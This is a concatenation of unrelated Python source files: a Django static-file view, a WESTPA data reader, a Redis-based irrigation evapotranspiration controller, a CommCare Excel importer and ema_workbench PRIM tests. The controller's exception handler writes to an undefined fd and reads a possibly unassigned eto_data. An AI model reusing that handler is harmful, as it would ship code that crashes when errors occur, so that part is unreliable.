and take note that returned value is no longer enclosed into
quotes.
"""
from invenio.utils.html import escape_javascript_string
if isinstance(text, six.string_types):
return '"%s"' % escape_javascript_string(text,
escape_for_html=False,
escape_CDATA=False,
escape_script_tag_with_quote=None)
else:
return text
|
"""
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.translation import gettext as _, gettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(path)
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
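# Illustrative sketch (not from this module): the usual development-only
# wiring for this view, mirroring the docstring above. The URL prefix and
# settings used here are placeholders.
#
#   from django.conf import settings
#   from django.conf.urls import url
#   from django.views.static import serve
#
#   if settings.DEBUG:
#       urlpatterns += [
#           url(r'^media/(?P<path>.*)$', serve,
#               {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),
#       ]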
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% if directory != "/" %}
<li><a href="../">../</a></li>
{% endif %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = gettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine(libraries={'i18n': 'django.templatetags.i18n'}).from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
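# Illustrative sketch (not part of the original module): the header may carry
# an optional "; length=<bytes>" suffix, which is checked against the file
# size as well as the timestamp.
#
#   was_modified_since('Wed, 21 Oct 2015 07:28:00 GMT; length=1024',
#                      mtime=1445412480, size=1024)        # -> False (unchanged)
#   was_modified_since(None, mtime=1445412480, size=1024)  # -> True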
|
# Copyright (C) 2013 Matthew C. Zwier and Lillian T. Chong
#
# This file is part of WESTPA.
#
# WESTPA is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WESTPA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WESTPA. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function; __metaclass__ = type
import numpy
from numpy import index_exp
from core import WESTToolComponent
import westpa
from westpa.extloader import get_object
from westpa.h5io import FnDSSpec, MultiDSSpec, SingleSegmentDSSpec, SingleIterDSSpec
def _get_parent_ids(n_iter, iter_group):
seg_index = iter_group['seg_index']
try:
return seg_index['parent_id'][:]
except ValueError:
# field not found
offsets = seg_index['parents_offset'][:]
all_parents = iter_group['parents'][...]
return numpy.require(all_parents.take(offsets),dtype=numpy.int64)
else:
return seg_index['parent_id']
class WESTDataReader(WESTToolComponent):
'''Tool for reading data from WEST-related HDF5 files. Coordinates finding
the main HDF5 file from west.cfg or command line arguments, caching of certain
kinds of data (eventually), and retrieving auxiliary data sets from various
places.'''
def __init__(self):
super(WESTDataReader,self).__init__()
self.data_manager = westpa.rc.get_data_manager()
self.we_h5filename = None
self._weight_dsspec = None
self._parent_id_dsspec = None
def add_args(self, parser):
group = parser.add_argument_group('WEST input data options')
group.add_argument('-W', '--west-data', dest='we_h5filename', metavar='WEST_H5FILE',
help='''Take WEST data from WEST_H5FILE (default: read from the HDF5 file specified in west.cfg).''')
def process_args(self, args):
if args.we_h5filename:
self.data_manager.we_h5filename = self.we_h5filename = args.we_h5filename
else:
self.we_h5filename = self.data_manager.we_h5filename
def open(self, mode='r'):
self.data_manager.open_backing(mode)
def close(self):
self.data_manager.close_backing()
def __getattr__(self, key):
return getattr(self.data_manager, key)
@property
def weight_dsspec(self):
if self._weight_dsspec is None:
assert self.we_h5filename is not None
self._weight_dsspec = SingleIterDSSpec(self.we_h5filename, 'seg_index', slice=index_exp['weight'])
return self._weight_dsspec
@property
def parent_id_dsspec(self):
if self._parent_id_dsspec is None:
assert self.we_h5filename is not None
#self._parent_id_dsspec = SingleIterDSSpec(self.we_h5filename, 'seg_index', slice=index_exp['parent_id'])
self._parent_id_dsspec = FnDSSpec(self.we_h5filename, _get_parent_ids)
return self._parent_id_dsspec
def __enter__(self):
self.open('r')
return self
def __exit__(self, exc_type, exc_val, exc_traceback):
self.close()
return False
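    # Illustrative sketch of typical wiring (assumed, not from the original
    # tool): pair add_args() with process_args(), then use the reader as a
    # context manager so the HDF5 backing file is closed again. The file name
    # 'west.h5' is a placeholder.
    #
    #   import argparse
    #   parser = argparse.ArgumentParser()
    #   reader = WESTDataReader()
    #   reader.add_args(parser)
    #   args = parser.parse_args(['-W', 'west.h5'])
    #   reader.process_args(args)
    #   with reader as data:
    #       weight_spec = data.weight_dsspec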
class WESTDSSynthesizer(WESTToolComponent):
'''Tool for synthesizing a dataset for analysis from other datasets. This
may be done using a custom function, or a list of "data set specifications".
It is anticipated that if several source datasets are required, then a tool
will have multiple instances of this class.'''
group_name = 'input dataset options'
def __init__(self, default_dsname = None, h5filename=None):
super(WESTDSSynthesizer,self).__init__()
self.h5filename = h5filename
self.default_dsname = default_dsname
self.dsspec = None
def add_args(self, parser):
igroup = parser.add_argument_group(self.group_name).add_mutually_exclusive_group(required=not bool(self.default_dsname))
igroup.add_argument('--construct-dataset',
help='''Use the given function (as in module.function) to extract source data.
This function will be called once per iteration as function(n_iter, iter_group)
to construct data for one iteration. Data returned must be indexable as
[seg_id][timepoint][dimension]''')
igroup.add_argument('--dsspecs', nargs='+', metavar='DSSPEC',
help='''Construct source data from one or more DSSPECs.''')
def process_args(self, args):
if args.construct_dataset:
self.dsspec = FnDSSpec(self.h5filename, get_object(args.construct_dataset,path=['.']))
elif args.dsspecs:
self.dsspec = MultiDSSpec([SingleSegmentDSSpec.from_string(dsspec, self.h5filename)
for dsspec in args.dsspecs])
else:
# we can only get here if a default dataset name was specified
assert self.default_dsname
self.dsspec = SingleSegmentDSSpec(self.h5filename, self.default_dsname)
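# Illustrative sketch (hypothetical module, not part of WESTPA): the contract
# for a --construct-dataset callable described in the help text above -- it is
# called once per iteration and must return data indexable as
# [seg_id][timepoint][dimension].
#
#   # my_dataset.py
#   import numpy
#   def pcoord_dataset(n_iter, iter_group):
#       # return the per-segment progress coordinate array for this iteration
#       return numpy.asarray(iter_group['pcoord'])
#
#   # selected on the command line as:
#   #   --construct-dataset my_dataset.pcoord_dataset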
|
# external control
import datetime
import time
import string
import urllib2
import math
import redis
import base64
import json
import eto
import py_cf
import os
#import sys # Need to have acces to sys.stdout
#fd = open('/media/mmc1/python/eto_debug.out.debug','a+') # open
#old_stdout = sys.stdout # store the default system handler to be able to restore it
#sys.stdout = fd # Now your file is used by print as destination
#fd.write( "this is a debug print \n"3)
#fd.write( "this is a debug print \n" )
class Eto_Management():
def __init__(self, redis ):
self.redis = redis
self.sites = sites = [ "MSRUC1", #SANTA ROSA PLATEAU CA US, Temecula, CA
"MECSC1", #EL CARISO CA US, Lake Elsinore, CA
"MCSPC1" #CSS CASE SPRINGS CA US, Murrieta, CA
]
self.alt = 2400
def calculate_daily_eto( self, chainFlowHandle, chainObj, parameters, event ):
        print(datetime.datetime.now())
        print("calculating yesterday eto")
eto_data = eto.determine_yesterday_eto(self.redis, self.sites, self.alt)
print("eto_data",eto_data)
#self.redis.set("YESTERDAY_ETO", eto_data )
#if int(self.redis.get("YESTERDAY_UPDATE_FLAG")) == 1 :
self.redis.set("YESTERDAY_ETO", eto_data )
self.update_sprinklers_time_bins( eto_data )
#self.redis.set("YESTERDAY_UPDATE_FLAG",0)
self.store_event_queue( "store_eto", eto_data)
def update_sprinklers_time_bins( self, yesterday_eto ):
list_string = self.redis.get( "ETO_RESOURCE_LIST" )
list_data = string.split(list_string,":")
for j in list_data:
try:
temp = self.redis.get( j )
temp = float(temp)
except:
temp = 0
temp = temp + yesterday_eto
if temp > .3 :
temp = .3
self.redis.set( j, temp )
def store_event_queue( self, event, data ):
log_data = {}
log_data["event"] = event
log_data["data"] = data
log_data["time"] = time.time()
json_data = json.dumps(log_data)
json_data = base64.b64encode(json_data)
self.redis.lpush( "cloud_event_queue", json_data)
self.redis.ltrim( "cloud_event_queue", 0,800)
def calculate_current_eto( self, chainFlowHandle, chainObj, parameters, event ):
print( "calculating eto \n")
try:
eto_data = eto.calculate_current_eto( self.sites, self.alt)
print( "current eto",(eto_data["net_et"],"\n"))
self.store_event_queue( "store_eto", eto_data )
self.redis.set("CURRENT_ETO", eto_data["net_et"] )
self.redis.set("CURRENT_ETO_DATA",eto_data)
print("updating eto \n")
except:
fd.write("exception in calculating eto \n")
self.redis.set("CURRENT_ETO", 0 )
self.redis.set("CURRENT_WIND_GUST", 0)
self.redis.set("CURRENT_WIND_GUST_TIME_STAMP", 0)
self.redis.set("CURRENT_ETO_DATA", 0)
self.store_event_queue( "store_eto_exception", eto_data["net_et"] )
def do_house_keeping( self, chainFlowHandle, chainObj, parameters, event ):
pass
#self.redis.set( "YESTERDAY_UPDATE_FLAG", 1 )
def delete_email_files( self,chainFlowHandle, chainOjb, parameters, event ):
print( str(datetime.datetime.now())+"\n")
print("deleteing emails \n")
eto.delete_email()
def restart( self,chainFlowHandle, chainOjb, parameters, event ):
pass
class Ntpd():
def __init__( self ):
pass
def get_time( self, chainFlowHandle, chainObj, parameters, event ):
os.system("ntpdate -b -s -u pool.ntp.org")
class Watch_Dog_Client():
def __init__(self, redis, directory, key, description ):
self.redis = redis
self.directory = directory
self.key = key
self.description = description
self.redis.hset(directory,key,None)
self.pat_wd( None, None, None, None)
def pat_wd( self, chainFlowHandle, chainObj, parameters, event ):
self.redis.delete( self.key )
temp = {}
temp["time"] = time.time()
temp["max_dt"] = 5*60
temp["pid"] = os.getpid()
temp["description"] = self.description
self.redis.set( self.key, json.dumps(temp) )
if __name__ == "__main__":
redis = redis.StrictRedis( host = "127.1.1.1", port=6379, db = 0 )
etm = Eto_Management( redis )
#etm.calculate_daily_eto( None,None,None,None)
print( "made it here on startup")
#etm.calculate_daily_eto( None,None,None,None)
#etm.delete_email_files( None, None, None, None )
ntpd = Ntpd()
device_directory = "WD_DIRECTORY"
wc = Watch_Dog_Client(redis, device_directory,"extern_ctrl","external control")
wc.pat_wd( None, None, None, None )
#
# Adding chains
#
cf = py_cf.CF_Interpreter()
#
# ETO processing elements
#
# cf.define_chain( "master_sequencer", True ) ## auto start thread
# cf.insert_link( "link_3", "Enable_Chain",[["new_day_house_keeping","get_current_eto","delete_cimis_email_data" ]])
# cf.insert_link( "link_4","Disable_Chain",[["master_sequencer"]])
cf.define_chain("get_current_eto",True)
cf.insert_link( "link_1", "WaitTod", ["*",12, "*","*" ] )
cf.insert_link( "link_2", "One_Step", [etm.calculate_daily_eto ] )
cf.insert_link( "link_3", "WaitTod", ["*",13,"*","*" ] )
cf.insert_link( "link_4", "Reset", [] )
cf.define_chain("delete_cimis_email_data",True)
cf.insert_link( "link_1","WaitTod",["*",14,"*","*" ])
cf.insert_link( "link_2","One_Step",[etm.delete_email_files])
cf.insert_link( "link_3","WaitTod",["*",15,"*","*" ])
cf.insert_link( "link_4","Reset",[])
# cf.define_chain("new_day_house_keeping",False)
# cf.insert_link( "link_1","WaitTod",["*",12,"*","*" ])
# cf.insert_link( "link_2","One_Step",[etm.do_house_keeping])
# cf.insert_link( "link_3","WaitTod",["*",13,"*","*" ])
# cf.insert_link( "link_4","Reset",[])
#
# cf.define_chain("get_current_eto",False)
# cf.insert_link( "link_1", "WaitTod", ["*",12, 20,"*" ] )
# cf.insert_link( "link_2", "One_Step", [etm.calculate_current_eto ] )
# cf.insert_link( "link_3", "One_Step", [etm.calculate_daily_eto ] )
# cf.insert_link( "link_4", "WaitTod", ["*",13,50,"*" ] )
# cf.insert_link( "link_5", "Reset", [] )
#
#
#
# internet time update
#
#
cf.define_chain("ntpd",True)
cf.insert_link( "link_9","Log",["ntpd"] )
cf.insert_link( "link_1", "One_Step", [ntpd.get_time] )
cf.insert_link( "link_10", "Log",["got time"] )
cf.insert_link( "link_2", "WaitEvent",[ "HOUR_TICK" ] )
cf.insert_link( "link_3", "Reset",[] )
#
#
# update clocks from internet
#
#
cf.define_chain("watch_dog_thread",True)
cf.insert_link( "link_1","WaitTod",["*","*","*",30 ])
cf.insert_link( "link_2","One_Step",[ wc.pat_wd ])
cf.insert_link( "link_3","WaitTod",["*","*","*",55 ])
cf.insert_link( "link_4","Reset",[])
#
# Executing chains
#
cf_environ = py_cf.Execute_Cf_Environment( cf )
cf_environ.execute()
|
from corehq.util.spreadsheets.excel import WorkbookJSONReader
from soil import DownloadBase
class UnknownFileRefException(Exception):
pass
class ExcelImporter(object):
"""
Base class for `SingleExcelImporter` and `MultiExcelImporter`.
This is not meant to be used directly.
"""
def __init__(self, task, file_ref_id):
self.task = task
self.progress = 0
if self.task:
DownloadBase.set_progress(self.task, 0, 100)
download_ref = DownloadBase.get(file_ref_id)
if download_ref is None:
raise UnknownFileRefException("Could not find file wih ref %s. It may have expired" % file_ref_id)
self.workbook = WorkbookJSONReader(download_ref.get_filename())
def mark_complete(self):
if self.task:
DownloadBase.set_progress(self.task, 100, 100)
def add_progress(self, count=1):
self.progress += count
if self.task:
DownloadBase.set_progress(self.task, self.progress, self.total_rows)
class SingleExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with only one
worksheet.
"""
def __init__(self, task, file_ref_id):
super(SingleExcelImporter, self).__init__(task, file_ref_id)
self.worksheet = self.workbook.worksheets[0]
self.total_rows = self.worksheet.worksheet.get_highest_row()
class MultiExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with multiple
relevant worksheets.
"""
def __init__(self, task, file_ref_id):
super(MultiExcelImporter, self).__init__(task, file_ref_id)
self.worksheets = self.workbook.worksheets
self.total_rows = sum(ws.worksheet.get_highest_row() for ws in self.worksheets)
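# Illustrative sketch (hypothetical task code, not part of this module):
# iterate the single worksheet, ticking progress per row and marking the
# download complete at the end. `task`, `file_ref_id` and `handle_row` are
# placeholders supplied by the caller.
#
#   importer = SingleExcelImporter(task, file_ref_id)
#   for row in importer.worksheet:
#       handle_row(row)
#       importer.add_progress()
#   importer.mark_complete()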
|
'''
Created on Mar 13, 2012
.. codeauthor:: jhkwakkel <j.h.kwakkel (at) tudelft (dot) nl>
'''
import unittest
import numpy as np
import pandas as pd
from ema_workbench.analysis import prim
from ema_workbench.analysis.prim import PrimBox
from test import utilities
from ema_workbench.analysis.scenario_discovery_util import RuleInductionType
def flu_classify(data):
#get the output for deceased population
result = data['deceased population region 1']
#make an empty array of length equal to number of cases
classes = np.zeros(result.shape[0])
    # if the deceased population is higher than 1,000,000 people, classify as 1
classes[result[:, -1] > 1000000] = 1
return classes
def scarcity_classify(outcomes):
outcome = outcomes['relative market price']
change = np.abs(outcome[:, 1::]-outcome[:, 0:-1])
neg_change = np.min(change, axis=1)
pos_change = np.max(change, axis=1)
logical = (neg_change > -0.6) & (pos_change > 0.6)
classes = np.zeros(outcome.shape[0])
classes[logical] = 1
return classes
class PrimBoxTestCase(unittest.TestCase):
def test_init(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([0,1,2])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
self.assertEqual(box.peeling_trajectory.shape, (1,6))
def test_select(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.select(0)
self.assertTrue(np.all(box.yi==prim_obj.yi))
def test_inspect(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.inspect(1)
box.inspect()
box.inspect(style='graph')
with self.assertRaises(ValueError):
box.inspect(style='some unknown style')
def test_show_ppt(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
cols = ['mean', 'mass', 'coverage', 'density', 'res_dim']
data = np.zeros((100, 5))
data[:, 0:4] = np.random.rand(100, 4)
data[:, 4] = np.random.randint(0, 5, size=(100, ))
box.peeling_trajectory = pd.DataFrame(data, columns=cols)
box.show_ppt()
def test_show_tradeoff(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = np.array([1,1,0])
prim_obj = prim.Prim(x, y, threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
cols = ['mean', 'mass', 'coverage', 'density', 'res_dim']
data = np.zeros((100, 5))
data[:, 0:4] = np.random.rand(100, 4)
data[:, 4] = np.random.randint(0, 5, size=(100, ))
box.peeling_trajectory = pd.DataFrame(data, columns=cols)
box.show_tradeoff()
def test_update(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
self.assertEqual(box.peeling_trajectory['mean'][1], 1)
self.assertEqual(box.peeling_trajectory['coverage'][1], 1)
self.assertEqual(box.peeling_trajectory['density'][1], 1)
self.assertEqual(box.peeling_trajectory['res_dim'][1], 1)
self.assertEqual(box.peeling_trajectory['mass'][1], 2/3)
def test_drop_restriction(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,2,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.drop_restriction('b')
correct_box_lims = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
box_lims = box.box_lims[-1]
names = box_lims.columns
for entry in names:
lim_correct = correct_box_lims[entry]
lim_box = box_lims[entry]
for i in range(len(lim_correct)):
self.assertEqual(lim_correct[i], lim_box[i])
self.assertEqual(box.peeling_trajectory['mean'][2], 1)
self.assertEqual(box.peeling_trajectory['coverage'][2], 1)
self.assertEqual(box.peeling_trajectory['density'][2], 1)
self.assertEqual(box.peeling_trajectory['res_dim'][2], 1)
self.assertEqual(box.peeling_trajectory['mass'][2], 2/3)
def test_calculate_quasi_p(self):
pass
class PrimTestCase(unittest.TestCase):
def test_setup_prim(self):
self.results = utilities.load_flu_data()
self.classify = flu_classify
experiments, outcomes = self.results
# test initialization, including t_coi calculation in case of searching
# for results equal to or higher than the threshold
outcomes['death toll'] = outcomes['deceased population region 1'][:, -1]
results = experiments, outcomes
threshold = 10000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.ABOVE, threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] >= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
# test initialization, including t_coi calculation in case of searching
# for results equal to or lower than the threshold
threshold = 1000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.BELOW,
threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] <= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
prim.setup_prim(self.results, self.classify, threshold=prim.ABOVE)
def test_boxes(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([0,1,2])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
boxes = prim_obj.boxes
self.assertEqual(len(boxes), 1, 'box length not correct')
# real data test case
prim_obj = prim.setup_prim(utilities.load_flu_data(), flu_classify,
threshold=0.8)
prim_obj.find_box()
boxes = prim_obj.boxes
self.assertEqual(len(boxes), 1, 'box length not correct')
def test_prim_init_select(self):
self.results = utilities.load_flu_data()
self.classify = flu_classify
experiments, outcomes = self.results
unc = experiments.columns.values.tolist()
# test initialization, including t_coi calculation in case of searching
# for results equal to or higher than the threshold
outcomes['death toll'] = outcomes['deceased population region 1'][:, -1]
results = experiments, outcomes
threshold = 10000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.ABOVE, threshold=threshold,
incl_unc=unc)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] >= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
# test initialization, including t_coi calculation in case of searching
# for results equal to or lower than the threshold
threshold = 1000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.BELOW,
threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] <= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
prim.setup_prim(self.results, self.classify, threshold=prim.ABOVE)
def test_quantile(self):
data = pd.Series(np.arange(10))
self.assertTrue(prim.get_quantile(data, 0.9)==8.5)
self.assertTrue(prim.get_quantile(data, 0.95)==8.5)
self.assertTrue(prim.get_quantile(data, 0.1)==0.5)
self.assertTrue(prim.get_quantile(data, 0.05)==0.5)
data = pd.Series(1)
self.assertTrue(prim.get_quantile(data, 0.9)==1)
self.assertTrue(prim.get_quantile(data, 0.95)==1)
self.assertTrue(prim.get_quantile(data, 0.1)==1)
self.assertTrue(prim.get_quantile(data, 0.05)==1)
data = pd.Series([1,1,2,3,4,5,6,7,8,9,9])
self.assertTrue(prim.get_quantile(data, 0.9)==8.5)
self.assertTrue(prim.get_quantile(data, 0.95)==8.5)
self.assertTrue(prim.get_quantile(data, 0.1)==1.5)
self.assertTrue(prim.get_quantile(data, 0.05)==1.5)
def test_box_init(self):
# test init box without NANS
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,7)],
columns=['a', 'b', 'c'])
y = np.array([0,1,2])
prim_obj = prim.Prim(x,y, threshold=0.5,
mode=RuleInductionType.REGRESSION)
box_init = prim_obj.box_init
# some test on the box
self.assertTrue(box_init.loc[0, 'a']==0)
self.assertTrue(box_init.loc[1, 'a']==3)
self.assertTrue(box_init.loc[0, 'b']==1)
self.assertTrue(box_init.loc[1, 'b']==5)
self.assertTrue(box_init.loc[0, 'c']==2)
self.assertTrue(box_init.loc[1, 'c']==7)
# heterogenous without NAN
x = pd.DataFrame([[0.1, 0, 'a'],
[0.2, 1, 'b'],
[0.3, 2, 'a'],
[0.4, 3, 'b'],
[0.5, 4, 'a'],
[0.6, 5, 'a'],
[0.7, 6, 'b'],
[0.8, 7, 'a'],
[0.9, 8, 'b'],
[1.0, 9, 'a']],
columns=['a', 'b', 'c'])
y = np.arange(0, x.shape[0])
prim_obj = prim.Prim(x,y, threshold=0.5,
mode=RuleInductionType.REGRESSION)
box_init = prim_obj.box_init
# some test on the box
self.assertTrue(box_init['a'][0]==0.1)
self.assertTrue(box_init['a'][1]==1.0)
self.assertTrue(box_init['b'][0]==0)
self.assertTrue(box_init['b'][1]==9)
self.assertTrue(box_init['c'][0]==set(['a','b']))
self.assertTrue(box_init['c'][1]==set(['a','b']))
def test_prim_exceptions(self):
results = utilities.load_flu_data()
x, outcomes = results
y = outcomes['deceased population region 1']
self.assertRaises(prim.PrimException, prim.Prim,
x, y, threshold=0.8,
mode=RuleInductionType.REGRESSION)
def test_find_box(self):
results = utilities.load_flu_data()
classify = flu_classify
prim_obj = prim.setup_prim(results, classify,
threshold=0.8)
box_1 = prim_obj.find_box()
prim_obj._update_yi_remaining(prim_obj)
after_find = box_1.yi.shape[0] + prim_obj.yi_remaining.shape[0]
self.assertEqual(after_find, prim_obj.y.shape[0])
box_2 = prim_obj.find_box()
prim_obj._update_yi_remaining(prim_obj)
after_find = box_1.yi.shape[0] +\
box_2.yi.shape[0] +\
prim_obj.yi_remaining.shape[0]
self.assertEqual(after_find, prim_obj.y.shape[0])
def test_discrete_peel(self):
x = pd.DataFrame(np.random.randint(0, 10, size=(100,), dtype=np.int),
columns=['a'])
y = np.zeros(100,)
y[x.a > 5] = 1
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
for peel in peels:
self.assertEqual(len(peel), 2)
indices, tempbox = peel
self.assertTrue(isinstance(indices, np.ndarray))
self.assertTrue(isinstance(tempbox, pd.DataFrame))
# have modified boxlims as starting point
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [1,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
for peel in peels:
self.assertEqual(len(peel), 2)
indices, tempbox = peel
self.assertTrue(isinstance(indices, np.ndarray))
self.assertTrue(isinstance(tempbox, pd.DataFrame))
# have modified boxlims as starting point
x.a[x.a>5] = 5
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [5,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
x.a[x.a<5] = 5
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [5,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
def test_categorical_peel(self):
x = pd.DataFrame(list(zip(np.random.rand(10,),
['a','b','a','b','a','a','b','a','b','a', ])),
columns=['a', 'b'])
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x, y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = pd.DataFrame([(0, set(['a','b'])),
(1, set(['a','b']))],
columns=['a', 'b'] )
